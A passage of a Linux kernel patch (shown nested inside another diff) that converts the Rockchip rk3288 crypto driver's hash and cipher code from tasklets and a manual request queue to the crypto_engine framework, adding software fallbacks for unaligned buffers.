+ 	clk_disable_unprepare(dev->sclk);
+ }
+ 
+-static int check_alignment(struct scatterlist *sg_src,
+-			   struct scatterlist *sg_dst,
+-			   int align_mask)
+-{
+-	int in, out, align;
+-
+-	in = IS_ALIGNED((uint32_t)sg_src->offset, 4) &&
+-	     IS_ALIGNED((uint32_t)sg_src->length, align_mask);
+-	if (!sg_dst)
+-		return in;
+-	out = IS_ALIGNED((uint32_t)sg_dst->offset, 4) &&
+-	      IS_ALIGNED((uint32_t)sg_dst->length, align_mask);
+-	align = in && out;
+-
+-	return (align && (sg_src->length == sg_dst->length));
+-}
+-
+-static int rk_load_data(struct rk_crypto_info *dev,
+-			struct scatterlist *sg_src,
+-			struct scatterlist *sg_dst)
+-{
+-	unsigned int count;
+-
+-	dev->aligned = dev->aligned ?
+-		check_alignment(sg_src, sg_dst, dev->align_size) :
+-		dev->aligned;
+-	if (dev->aligned) {
+-		count = min(dev->left_bytes, sg_src->length);
+-		dev->left_bytes -= count;
+-
+-		if (!dma_map_sg(dev->dev, sg_src, 1, DMA_TO_DEVICE)) {
+-			dev_err(dev->dev, "[%s:%d] dma_map_sg(src)  error\n",
+-				__func__, __LINE__);
+-			return -EINVAL;
+-		}
+-		dev->addr_in = sg_dma_address(sg_src);
+-
+-		if (sg_dst) {
+-			if (!dma_map_sg(dev->dev, sg_dst, 1, DMA_FROM_DEVICE)) {
+-				dev_err(dev->dev,
+-					"[%s:%d] dma_map_sg(dst)  error\n",
+-					__func__, __LINE__);
+-				dma_unmap_sg(dev->dev, sg_src, 1,
+-					     DMA_TO_DEVICE);
+-				return -EINVAL;
+-			}
+-			dev->addr_out = sg_dma_address(sg_dst);
+-		}
+-	} else {
+-		count = (dev->left_bytes > PAGE_SIZE) ?
+-			PAGE_SIZE : dev->left_bytes;
+-
+-		if (!sg_pcopy_to_buffer(dev->first, dev->src_nents,
+-					dev->addr_vir, count,
+-					dev->total - dev->left_bytes)) {
+-			dev_err(dev->dev, "[%s:%d] pcopy err\n",
+-				__func__, __LINE__);
+-			return -EINVAL;
+-		}
+-		dev->left_bytes -= count;
+-		sg_init_one(&dev->sg_tmp, dev->addr_vir, count);
+-		if (!dma_map_sg(dev->dev, &dev->sg_tmp, 1, DMA_TO_DEVICE)) {
+-			dev_err(dev->dev, "[%s:%d] dma_map_sg(sg_tmp)  error\n",
+-				__func__, __LINE__);
+-			return -ENOMEM;
+-		}
+-		dev->addr_in = sg_dma_address(&dev->sg_tmp);
+-
+-		if (sg_dst) {
+-			if (!dma_map_sg(dev->dev, &dev->sg_tmp, 1,
+-					DMA_FROM_DEVICE)) {
+-				dev_err(dev->dev,
+-					"[%s:%d] dma_map_sg(sg_tmp)  error\n",
+-					__func__, __LINE__);
+-				dma_unmap_sg(dev->dev, &dev->sg_tmp, 1,
+-					     DMA_TO_DEVICE);
+-				return -ENOMEM;
+-			}
+-			dev->addr_out = sg_dma_address(&dev->sg_tmp);
+-		}
+-	}
+-	dev->count = count;
+-	return 0;
+-}
+-
+-static void rk_unload_data(struct rk_crypto_info *dev)
+-{
+-	struct scatterlist *sg_in, *sg_out;
+-
+-	sg_in = dev->aligned ? dev->sg_src : &dev->sg_tmp;
+-	dma_unmap_sg(dev->dev, sg_in, 1, DMA_TO_DEVICE);
+-
+-	if (dev->sg_dst) {
+-		sg_out = dev->aligned ? dev->sg_dst : &dev->sg_tmp;
+-		dma_unmap_sg(dev->dev, sg_out, 1, DMA_FROM_DEVICE);
+-	}
+-}
+-
+ static irqreturn_t rk_crypto_irq_handle(int irq, void *dev_id)
+ {
+ 	struct rk_crypto_info *dev  = platform_get_drvdata(dev_id);
+ 	u32 interrupt_status;
+ 
+-	spin_lock(&dev->lock);
+ 	interrupt_status = CRYPTO_READ(dev, RK_CRYPTO_INTSTS);
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_INTSTS, interrupt_status);
+ 
++	dev->status = 1;
+ 	if (interrupt_status & 0x0a) {
+ 		dev_warn(dev->dev, "DMA Error\n");
+-		dev->err = -EFAULT;
++		dev->status = 0;
+ 	}
+-	tasklet_schedule(&dev->done_task);
++	complete(&dev->complete);
+ 
+-	spin_unlock(&dev->lock);
+ 	return IRQ_HANDLED;
+ }
+ 
+-static int rk_crypto_enqueue(struct rk_crypto_info *dev,
+-			      struct crypto_async_request *async_req)
+-{
+-	unsigned long flags;
+-	int ret;
+-
+-	spin_lock_irqsave(&dev->lock, flags);
+-	ret = crypto_enqueue_request(&dev->queue, async_req);
+-	if (dev->busy) {
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		return ret;
+-	}
+-	dev->busy = true;
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-	tasklet_schedule(&dev->queue_task);
+-
+-	return ret;
+-}
+-
+-static void rk_crypto_queue_task_cb(unsigned long data)
+-{
+-	struct rk_crypto_info *dev = (struct rk_crypto_info *)data;
+-	struct crypto_async_request *async_req, *backlog;
+-	unsigned long flags;
+-	int err = 0;
+-
+-	dev->err = 0;
+-	spin_lock_irqsave(&dev->lock, flags);
+-	backlog   = crypto_get_backlog(&dev->queue);
+-	async_req = crypto_dequeue_request(&dev->queue);
+-
+-	if (!async_req) {
+-		dev->busy = false;
+-		spin_unlock_irqrestore(&dev->lock, flags);
+-		return;
+-	}
+-	spin_unlock_irqrestore(&dev->lock, flags);
+-
+-	if (backlog) {
+-		backlog->complete(backlog, -EINPROGRESS);
+-		backlog = NULL;
+-	}
+-
+-	dev->async_req = async_req;
+-	err = dev->start(dev);
+-	if (err)
+-		dev->complete(dev->async_req, err);
+-}
+-
+-static void rk_crypto_done_task_cb(unsigned long data)
+-{
+-	struct rk_crypto_info *dev = (struct rk_crypto_info *)data;
+-
+-	if (dev->err) {
+-		dev->complete(dev->async_req, dev->err);
+-		return;
+-	}
+-
+-	dev->err = dev->update(dev);
+-	if (dev->err)
+-		dev->complete(dev->async_req, dev->err);
+-}
+-
+ static struct rk_crypto_tmp *rk_cipher_algs[] = {
+ 	&rk_ecb_aes_alg,
+ 	&rk_cbc_aes_alg,
+@@ -337,8 +175,6 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	if (err)
+ 		goto err_crypto;
+ 
+-	spin_lock_init(&crypto_info->lock);
+-
+ 	crypto_info->reg = devm_platform_ioremap_resource(pdev, 0);
+ 	if (IS_ERR(crypto_info->reg)) {
+ 		err = PTR_ERR(crypto_info->reg);
+@@ -389,18 +225,11 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	crypto_info->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, crypto_info);
+ 
+-	tasklet_init(&crypto_info->queue_task,
+-		     rk_crypto_queue_task_cb, (unsigned long)crypto_info);
+-	tasklet_init(&crypto_info->done_task,
+-		     rk_crypto_done_task_cb, (unsigned long)crypto_info);
+-	crypto_init_queue(&crypto_info->queue, 50);
++	crypto_info->engine = crypto_engine_alloc_init(&pdev->dev, true);
++	crypto_engine_start(crypto_info->engine);
++	init_completion(&crypto_info->complete);
+ 
+-	crypto_info->enable_clk = rk_crypto_enable_clk;
+-	crypto_info->disable_clk = rk_crypto_disable_clk;
+-	crypto_info->load_data = rk_load_data;
+-	crypto_info->unload_data = rk_unload_data;
+-	crypto_info->enqueue = rk_crypto_enqueue;
+-	crypto_info->busy = false;
++	rk_crypto_enable_clk(crypto_info);
+ 
+ 	err = rk_crypto_register(crypto_info);
+ 	if (err) {
+@@ -412,9 +241,9 @@ static int rk_crypto_probe(struct platform_device *pdev)
+ 	return 0;
+ 
+ err_register_alg:
+-	tasklet_kill(&crypto_info->queue_task);
+-	tasklet_kill(&crypto_info->done_task);
++	crypto_engine_exit(crypto_info->engine);
+ err_crypto:
++	dev_err(dev, "Crypto Accelerator not successfully registered\n");
+ 	return err;
+ }
+ 
+@@ -423,8 +252,8 @@ static int rk_crypto_remove(struct platform_device *pdev)
+ 	struct rk_crypto_info *crypto_tmp = platform_get_drvdata(pdev);
+ 
+ 	rk_crypto_unregister();
+-	tasklet_kill(&crypto_tmp->done_task);
+-	tasklet_kill(&crypto_tmp->queue_task);
++	rk_crypto_disable_clk(crypto_tmp);
++	crypto_engine_exit(crypto_tmp->engine);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/crypto/rockchip/rk3288_crypto.h b/drivers/crypto/rockchip/rk3288_crypto.h
+index 97278c2574ff9..045e811b4af84 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto.h
++++ b/drivers/crypto/rockchip/rk3288_crypto.h
+@@ -5,9 +5,11 @@
+ #include <crypto/aes.h>
+ #include <crypto/internal/des.h>
+ #include <crypto/algapi.h>
++#include <linux/dma-mapping.h>
+ #include <linux/interrupt.h>
+ #include <linux/delay.h>
+ #include <linux/scatterlist.h>
++#include <crypto/engine.h>
+ #include <crypto/internal/hash.h>
+ #include <crypto/internal/skcipher.h>
+ 
+@@ -193,45 +195,15 @@ struct rk_crypto_info {
+ 	struct reset_control		*rst;
+ 	void __iomem			*reg;
+ 	int				irq;
+-	struct crypto_queue		queue;
+-	struct tasklet_struct		queue_task;
+-	struct tasklet_struct		done_task;
+-	struct crypto_async_request	*async_req;
+-	int 				err;
+-	/* device lock */
+-	spinlock_t			lock;
+-
+-	/* the public variable */
+-	struct scatterlist		*sg_src;
+-	struct scatterlist		*sg_dst;
+-	struct scatterlist		sg_tmp;
+-	struct scatterlist		*first;
+-	unsigned int			left_bytes;
+-	void				*addr_vir;
+-	int				aligned;
+-	int				align_size;
+-	size_t				src_nents;
+-	size_t				dst_nents;
+-	unsigned int			total;
+-	unsigned int			count;
+-	dma_addr_t			addr_in;
+-	dma_addr_t			addr_out;
+-	bool				busy;
+-	int (*start)(struct rk_crypto_info *dev);
+-	int (*update)(struct rk_crypto_info *dev);
+-	void (*complete)(struct crypto_async_request *base, int err);
+-	int (*enable_clk)(struct rk_crypto_info *dev);
+-	void (*disable_clk)(struct rk_crypto_info *dev);
+-	int (*load_data)(struct rk_crypto_info *dev,
+-			 struct scatterlist *sg_src,
+-			 struct scatterlist *sg_dst);
+-	void (*unload_data)(struct rk_crypto_info *dev);
+-	int (*enqueue)(struct rk_crypto_info *dev,
+-		       struct crypto_async_request *async_req);
++
++	struct crypto_engine *engine;
++	struct completion complete;
++	int status;
+ };
+ 
+ /* the private variable of hash */
+ struct rk_ahash_ctx {
++	struct crypto_engine_ctx enginectx;
+ 	struct rk_crypto_info		*dev;
+ 	/* for fallback */
+ 	struct crypto_ahash		*fallback_tfm;
+@@ -241,14 +213,23 @@ struct rk_ahash_ctx {
+ struct rk_ahash_rctx {
+ 	struct ahash_request		fallback_req;
+ 	u32				mode;
++	int nrsg;
+ };
+ 
+ /* the private variable of cipher */
+ struct rk_cipher_ctx {
++	struct crypto_engine_ctx enginectx;
+ 	struct rk_crypto_info		*dev;
+ 	unsigned int			keylen;
+-	u32				mode;
++	u8				key[AES_MAX_KEY_SIZE];
+ 	u8				iv[AES_BLOCK_SIZE];
++	struct crypto_skcipher *fallback_tfm;
++};
++
++struct rk_cipher_rctx {
++	u8 backup_iv[AES_BLOCK_SIZE];
++	u32				mode;
++	struct skcipher_request fallback_req;   // keep at the end
+ };
+ 
+ enum alg_type {
+diff --git a/drivers/crypto/rockchip/rk3288_crypto_ahash.c b/drivers/crypto/rockchip/rk3288_crypto_ahash.c
+index ed03058497bc2..edd40e16a3f0a 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto_ahash.c
++++ b/drivers/crypto/rockchip/rk3288_crypto_ahash.c
+@@ -9,6 +9,7 @@
+  * Some ideas are from marvell/cesa.c and s5p-sss.c driver.
+  */
+ #include <linux/device.h>
++#include <asm/unaligned.h>
+ #include "rk3288_crypto.h"
+ 
+ /*
+@@ -16,6 +17,40 @@
+  * so we put the fixed hash out when met zero message.
+  */
+ 
++static bool rk_ahash_need_fallback(struct ahash_request *req)
++{
++	struct scatterlist *sg;
++
++	sg = req->src;
++	while (sg) {
++		if (!IS_ALIGNED(sg->offset, sizeof(u32))) {
++			return true;
++		}
++		if (sg->length % 4) {
++			return true;
++		}
++		sg = sg_next(sg);
++	}
++	return false;
++}
++
++static int rk_ahash_digest_fb(struct ahash_request *areq)
++{
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_ctx *tfmctx = crypto_ahash_ctx(tfm);
++
++	ahash_request_set_tfm(&rctx->fallback_req, tfmctx->fallback_tfm);
++	rctx->fallback_req.base.flags = areq->base.flags &
++					CRYPTO_TFM_REQ_MAY_SLEEP;
++
++	rctx->fallback_req.nbytes = areq->nbytes;
++	rctx->fallback_req.src = areq->src;
++	rctx->fallback_req.result = areq->result;
++
++	return crypto_ahash_digest(&rctx->fallback_req);
++}
++
+ static int zero_message_process(struct ahash_request *req)
+ {
+ 	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
+@@ -38,16 +73,12 @@ static int zero_message_process(struct ahash_request *req)
+ 	return 0;
+ }
+ 
+-static void rk_ahash_crypto_complete(struct crypto_async_request *base, int err)
+-{
+-	if (base->complete)
+-		base->complete(base, err);
+-}
+-
+-static void rk_ahash_reg_init(struct rk_crypto_info *dev)
++static void rk_ahash_reg_init(struct ahash_request *req)
+ {
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+ 	struct rk_ahash_rctx *rctx = ahash_request_ctx(req);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(req);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	struct rk_crypto_info *dev = tctx->dev;
+ 	int reg_status;
+ 
+ 	reg_status = CRYPTO_READ(dev, RK_CRYPTO_CTRL) |
+@@ -74,7 +105,7 @@ static void rk_ahash_reg_init(struct rk_crypto_info *dev)
+ 					  RK_CRYPTO_BYTESWAP_BRFIFO |
+ 					  RK_CRYPTO_BYTESWAP_BTFIFO);
+ 
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HASH_MSG_LEN, dev->total);
++	CRYPTO_WRITE(dev, RK_CRYPTO_HASH_MSG_LEN, req->nbytes);
+ }
+ 
+ static int rk_ahash_init(struct ahash_request *req)
+@@ -167,48 +198,64 @@ static int rk_ahash_digest(struct ahash_request *req)
+ 	struct rk_ahash_ctx *tctx = crypto_tfm_ctx(req->base.tfm);
+ 	struct rk_crypto_info *dev = tctx->dev;
+ 
++	if (rk_ahash_need_fallback(req))
++		return rk_ahash_digest_fb(req);
++
+ 	if (!req->nbytes)
+ 		return zero_message_process(req);
+-	else
+-		return dev->enqueue(dev, &req->base);
++
++	return crypto_transfer_hash_request_to_engine(dev->engine, req);
+ }
+ 
+-static void crypto_ahash_dma_start(struct rk_crypto_info *dev)
++static void crypto_ahash_dma_start(struct rk_crypto_info *dev, struct scatterlist *sg)
+ {
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAS, dev->addr_in);
+-	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAL, (dev->count + 3) / 4);
++	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAS, sg_dma_address(sg));
++	CRYPTO_WRITE(dev, RK_CRYPTO_HRDMAL, sg_dma_len(sg) / 4);
+ 	CRYPTO_WRITE(dev, RK_CRYPTO_CTRL, RK_CRYPTO_HASH_START |
+ 					  (RK_CRYPTO_HASH_START << 16));
+ }
+ 
+-static int rk_ahash_set_data_start(struct rk_crypto_info *dev)
++static int rk_hash_prepare(struct crypto_engine *engine, void *breq)
++{
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	int ret;
++
++	ret = dma_map_sg(tctx->dev->dev, areq->src, sg_nents(areq->src), DMA_TO_DEVICE);
++	if (ret <= 0)
++		return -EINVAL;
++
++	rctx->nrsg = ret;
++
++	return 0;
++}
++
++static int rk_hash_unprepare(struct crypto_engine *engine, void *breq)
+ {
+-	int err;
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
+ 
+-	err = dev->load_data(dev, dev->sg_src, NULL);
+-	if (!err)
+-		crypto_ahash_dma_start(dev);
+-	return err;
++	dma_unmap_sg(tctx->dev->dev, areq->src, rctx->nrsg, DMA_TO_DEVICE);
++	return 0;
+ }
+ 
+-static int rk_ahash_start(struct rk_crypto_info *dev)
++static int rk_hash_run(struct crypto_engine *engine, void *breq)
+ {
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+-	struct crypto_ahash *tfm;
+-	struct rk_ahash_rctx *rctx;
+-
+-	dev->total = req->nbytes;
+-	dev->left_bytes = req->nbytes;
+-	dev->aligned = 0;
+-	dev->align_size = 4;
+-	dev->sg_dst = NULL;
+-	dev->sg_src = req->src;
+-	dev->first = req->src;
+-	dev->src_nents = sg_nents(req->src);
+-	rctx = ahash_request_ctx(req);
++	struct ahash_request *areq = container_of(breq, struct ahash_request, base);
++	struct crypto_ahash *tfm = crypto_ahash_reqtfm(areq);
++	struct rk_ahash_rctx *rctx = ahash_request_ctx(areq);
++	struct rk_ahash_ctx *tctx = crypto_ahash_ctx(tfm);
++	struct scatterlist *sg = areq->src;
++	int err = 0;
++	int i;
++	u32 v;
++
+ 	rctx->mode = 0;
+ 
+-	tfm = crypto_ahash_reqtfm(req);
+ 	switch (crypto_ahash_digestsize(tfm)) {
+ 	case SHA1_DIGEST_SIZE:
+ 		rctx->mode = RK_CRYPTO_HASH_SHA1;
+@@ -220,32 +267,26 @@ static int rk_ahash_start(struct rk_crypto_info *dev)
+ 		rctx->mode = RK_CRYPTO_HASH_MD5;
+ 		break;
+ 	default:
+-		return -EINVAL;
++		err =  -EINVAL;
++		goto theend;
+ 	}
+ 
+-	rk_ahash_reg_init(dev);
+-	return rk_ahash_set_data_start(dev);
+-}
+-
+-static int rk_ahash_crypto_rx(struct rk_crypto_info *dev)
+-{
+-	int err = 0;
+-	struct ahash_request *req = ahash_request_cast(dev->async_req);
+-	struct crypto_ahash *tfm;
+-
+-	dev->unload_data(dev);
+-	if (dev->left_bytes) {
+-		if (dev->aligned) {
+-			if (sg_is_last(dev->sg_src)) {
+-				dev_warn(dev->dev, "[%s:%d], Lack of data\n",
+-					 __func__, __LINE__);
+-				err = -ENOMEM;
+-				goto out_rx;
+-			}
+-			dev->sg_src = sg_next(dev->sg_src);
++	rk_ahash_reg_init(areq);
++
++	while (sg) {
++		reinit_completion(&tctx->dev->complete);
++		tctx->dev->status = 0;
++		crypto_ahash_dma_start(tctx->dev, sg);
++		wait_for_completion_interruptible_timeout(&tctx->dev->complete,
++							  msecs_to_jiffies(2000));
++		if (!tctx->dev->status) {
++			dev_err(tctx->dev->dev, "DMA timeout\n");
++			err = -EFAULT;
++			goto theend;
+ 		}
+-		err = rk_ahash_set_data_start(dev);
+-	} else {
++		sg = sg_next(sg);
++	}
++
+ 		/*
+ 		 * it will take some time to process date after last dma
+ 		 * transmission.
+@@ -256,18 +297,20 @@ static int rk_ahash_crypto_rx(struct rk_crypto_info *dev)
+ 		 * efficiency, and make it response quickly when dma
+ 		 * complete.
+ 		 */
+-		while (!CRYPTO_READ(dev, RK_CRYPTO_HASH_STS))
+-			udelay(10);
+-
+-		tfm = crypto_ahash_reqtfm(req);
+-		memcpy_fromio(req->result, dev->reg + RK_CRYPTO_HASH_DOUT_0,
+-			      crypto_ahash_digestsize(tfm));
+-		dev->complete(dev->async_req, 0);
+-		tasklet_schedule(&dev->queue_task);
++	while (!CRYPTO_READ(tctx->dev, RK_CRYPTO_HASH_STS))
++		udelay(10);
++
++	for (i = 0; i < crypto_ahash_digestsize(tfm) / 4; i++) {
++		v = readl(tctx->dev->reg + RK_CRYPTO_HASH_DOUT_0 + i * 4);
++		put_unaligned_le32(v, areq->result + i * 4);
+ 	}
+ 
+-out_rx:
+-	return err;
++theend:
++	local_bh_disable();
++	crypto_finalize_hash_request(engine, breq, err);
++	local_bh_enable();
++
++	return 0;
+ }
+ 
+ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+@@ -281,14 +324,6 @@ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+ 	algt = container_of(alg, struct rk_crypto_tmp, alg.hash);
+ 
+ 	tctx->dev = algt->dev;
+-	tctx->dev->addr_vir = (void *)__get_free_page(GFP_KERNEL);
+-	if (!tctx->dev->addr_vir) {
+-		dev_err(tctx->dev->dev, "failed to kmalloc for addr_vir\n");
+-		return -ENOMEM;
+-	}
+-	tctx->dev->start = rk_ahash_start;
+-	tctx->dev->update = rk_ahash_crypto_rx;
+-	tctx->dev->complete = rk_ahash_crypto_complete;
+ 
+ 	/* for fallback */
+ 	tctx->fallback_tfm = crypto_alloc_ahash(alg_name, 0,
+@@ -297,19 +332,23 @@ static int rk_cra_hash_init(struct crypto_tfm *tfm)
+ 		dev_err(tctx->dev->dev, "Could not load fallback driver.\n");
+ 		return PTR_ERR(tctx->fallback_tfm);
+ 	}
++
+ 	crypto_ahash_set_reqsize(__crypto_ahash_cast(tfm),
+ 				 sizeof(struct rk_ahash_rctx) +
+ 				 crypto_ahash_reqsize(tctx->fallback_tfm));
+ 
+-	return tctx->dev->enable_clk(tctx->dev);
++	tctx->enginectx.op.do_one_request = rk_hash_run;
++	tctx->enginectx.op.prepare_request = rk_hash_prepare;
++	tctx->enginectx.op.unprepare_request = rk_hash_unprepare;
++
++	return 0;
+ }
+ 
+ static void rk_cra_hash_exit(struct crypto_tfm *tfm)
+ {
+ 	struct rk_ahash_ctx *tctx = crypto_tfm_ctx(tfm);
+ 
+-	free_page((unsigned long)tctx->dev->addr_vir);
+-	return tctx->dev->disable_clk(tctx->dev);
++	crypto_free_ahash(tctx->fallback_tfm);
+ }
+ 
+ struct rk_crypto_tmp rk_ahash_sha1 = {
+diff --git a/drivers/crypto/rockchip/rk3288_crypto_skcipher.c b/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
+index 5bbf0d2722e11..67a7e05d5ae31 100644
+--- a/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
++++ b/drivers/crypto/rockchip/rk3288_crypto_skcipher.c
+@@ -9,23 +9,77 @@
+  * Some ideas are from marvell-cesa.c and s5p-sss.c driver.
+  */
+ #include <linux/device.h>
++#include <crypto/scatterwalk.h>
+ #include "rk3288_crypto.h"
+ 
+ #define RK_CRYPTO_DEC			BIT(0)
+ 
+-static void rk_crypto_complete(struct crypto_async_request *base, int err)
++static int rk_cipher_need_fallback(struct skcipher_request *req)
+ {
+-	if (base->complete)
+-		base->complete(base, err);
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
++	unsigned int bs = crypto_skcipher_blocksize(tfm);
++	struct scatterlist *sgs, *sgd;
++	unsigned int stodo, dtodo, len;
++
++	if (!req->cryptlen)
++		return true;
++
++	len = req->cryptlen;
++	sgs = req->src;
++	sgd = req->dst;
++	while (sgs && sgd) {
++		if (!IS_ALIGNED(sgs->offset, sizeof(u32))) {
++			return true;
++		}
++		if (!IS_ALIGNED(sgd->offset, sizeof(u32))) {
++			return true;
++		}
++		stodo = min(len, sgs->length);
++		if (stodo % bs) {
++			return true;
++		}
++		dtodo = min(len, sgd->length);
++		if (dtodo % bs) {
++			return true;
++		}
++		if (stodo != dtodo) {
++			return true;
++		}
++		len -= stodo;
++		sgs = sg_next(sgs);
++		sgd = sg_next(sgd);
++	}
++	return false;
++}
++
++static int rk_cipher_fallback(struct skcipher_request *areq)
++{
++	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(areq);
++	struct rk_cipher_ctx *op = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(areq);
++	int err;
++
++	skcipher_request_set_tfm(&rctx->fallback_req, op->fallback_tfm);
++	skcipher_request_set_callback(&rctx->fallback_req, areq->base.flags,
++				      areq->base.complete, areq->base.data);
++	skcipher_request_set_crypt(&rctx->fallback_req, areq->src, areq->dst,
++				   areq->cryptlen, areq->iv);
++	if (rctx->mode & RK_CRYPTO_DEC)
++		err = crypto_skcipher_decrypt(&rctx->fallback_req);
++	else
++		err = crypto_skcipher_encrypt(&rctx->fallback_req);
++	return err;
+ }
+ 
+ static int rk_handle_req(struct rk_crypto_info *dev,
+ 			 struct skcipher_request *req)
+ {
+-	if (!IS_ALIGNED(req->cryptlen, dev->align_size))
+-		return -EINVAL;
+-	else
+-		return dev->enqueue(dev, &req->base);
++	struct crypto_engine *engine = dev->engine;
++
++	if (rk_cipher_need_fallback(req))
++		return rk_cipher_fallback(req);
++
++	return crypto_transfer_skcipher_request_to_engine(engine, req);
+ }
+ 
+ static int rk_aes_setkey(struct crypto_skcipher *cipher,
+@@ -38,8 +92,9 @@ static int rk_aes_setkey(struct crypto_skcipher *cipher,
+ 	    keylen != AES_KEYSIZE_256)
+ 		return -EINVAL;
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_AES_KEY_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_des_setkey(struct crypto_skcipher *cipher,
+@@ -53,8 +108,9 @@ static int rk_des_setkey(struct crypto_skcipher *cipher,
+ 		return err;
+ 
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_tdes_setkey(struct crypto_skcipher *cipher,
+@@ -68,17 +124,19 @@ static int rk_tdes_setkey(struct crypto_skcipher *cipher,
+ 		return err;
+ 
+ 	ctx->keylen = keylen;
+-	memcpy_toio(ctx->dev->reg + RK_CRYPTO_TDES_KEY1_0, key, keylen);
+-	return 0;
++	memcpy(ctx->key, key, keylen);
++
++	return crypto_skcipher_setkey(ctx->fallback_tfm, key, keylen);
+ }
+ 
+ static int rk_aes_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_ECB_MODE;
++	rctx->mode = RK_CRYPTO_AES_ECB_MODE;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -86,9 +144,10 @@ static int rk_aes_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_ECB_MODE | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_AES_ECB_MODE | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -96,9 +155,10 @@ static int rk_aes_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_CBC_MODE;
++	rctx->mode = RK_CRYPTO_AES_CBC_MODE;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -106,9 +166,10 @@ static int rk_aes_cbc_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_AES_CBC_MODE | RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_AES_CBC_MODE | RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -116,9 +177,10 @@ static int rk_des_ecb_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = 0;
++	rctx->mode = 0;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -126,9 +188,10 @@ static int rk_des_ecb_decrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
+ 	struct rk_cipher_ctx *ctx = crypto_skcipher_ctx(tfm);
++	struct rk_cipher_rctx *rctx = skcipher_request_ctx(req);
+ 	struct rk_crypto_info *dev = ctx->dev;
+ 
+-	ctx->mode = RK_CRYPTO_DEC;
++	rctx->mode = RK_CRYPTO_DEC;
+ 	return rk_handle_req(dev, req);
+ }
+ 
+@@ -136,9 +199,10 @@ static int rk_des_cbc_encrypt(struct skcipher_request *req)
+ {
+ 	struct crypto_skcipher *tfm = crypto_skcipher_reqtfm(req);
